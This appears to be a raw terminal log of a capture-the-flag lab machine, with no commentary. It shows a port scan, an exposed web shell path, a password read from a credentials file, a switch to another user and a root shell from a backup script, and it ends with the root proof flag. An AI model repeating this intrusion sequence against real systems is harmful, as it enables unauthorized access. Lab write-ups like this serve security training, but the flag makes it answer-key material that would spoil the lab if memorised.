hack@kali:~$ nmap -A -p- 192.168.43.88
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 19:14 CEST
Nmap scan report for 192.168.43.88
Host is up (0.0036s latency).                                                                      
Not shown: 65526 filtered ports                                                                    
PORT      STATE  SERVICE VERSION                                                                   
22/tcp    open   ssh     OpenSSH 7.4 (protocol 2.0)                                                
| ssh-hostkey:                                                                                     
|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)                                     
|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)                                    
|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)                                  
80/tcp    open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)                                  
| http-methods:                                                                                    
|_  Potentially risky methods: TRACE                                                               
| http-robots.txt: 1 disallowed entry                                                              
|_/phpbash.php                                                                                     
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16                                             
|_http-title: Check your Privilege                                                                 
111/tcp   open   rpcbind 2-4 (RPC #100000)                                                         
| rpcinfo:                                                                                         
|   program version    port/proto  service                                                         
|   100000  2,3,4        111/tcp   rpcbind                                                         
|   100000  2,3,4        111/udp   rpcbind                                                         
|   100000  3,4          111/tcp6  rpcbind                                                         
|   100000  3,4          111/udp6  rpcbind                                                         
|   100003  3,4         2049/tcp   nfs                                                             
|   100003  3,4         2049/tcp6  nfs                                                             
|   100003  3,4         2049/udp   nfs                                                             
|   100003  3,4         2049/udp6  nfs                                                             
|   100005  1,2,3      20048/tcp   mountd                                                          
|   100005  1,2,3      20048/tcp6  mountd                                                          
|   100005  1,2,3      20048/udp   mountd                                                          
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      34235/tcp6  nlockmgr
|   100021  1,3,4      37953/udp6  nlockmgr
|   100021  1,3,4      39853/tcp   nlockmgr
|   100021  1,3,4      45003/udp   nlockmgr
|   100024  1          42920/udp6  status
|   100024  1          44262/tcp   status
|   100024  1          57851/tcp6  status
|   100024  1          60068/udp   status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
875/tcp   closed unknown
2049/tcp  open   nfs_acl 3 (RPC #100227)
20048/tcp open   mountd  1-3 (RPC #100005)
42955/tcp closed unknown
46666/tcp closed unknown
54302/tcp closed unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.13 seconds



apache@my_privilege
:/home/armour# cat Credentials.txt

my password is
md5(rootroot1)

md5=b7bc8489abe360486b4b19dbc242e885


bash-4.2$ su armour
Password: b7bc8489abe360486b4b19dbc242e885
[armour@my_privilege ~]$ 
[armour@my_privilege ~]$ ls
Credentials.txt  backup.sh  reverse-shell.php  runme.sh
[armour@my_privilege ~]$ ./ba   ^H^H
bash: ./backup.s: No such file or directory
[armour@my_privilege ~]$ ./backup.sh
backup me
[root@my_privilege armour]# id
uid=0(root) gid=0(root) groups=0(root)
[root@my_privilege armour]# cd /root
[root@my_privilege ~]# ls
proof.txt
[root@my_privilege ~]# cat proof.txt
Best of Luck
628435356e49f976bab2c04948d22fe4

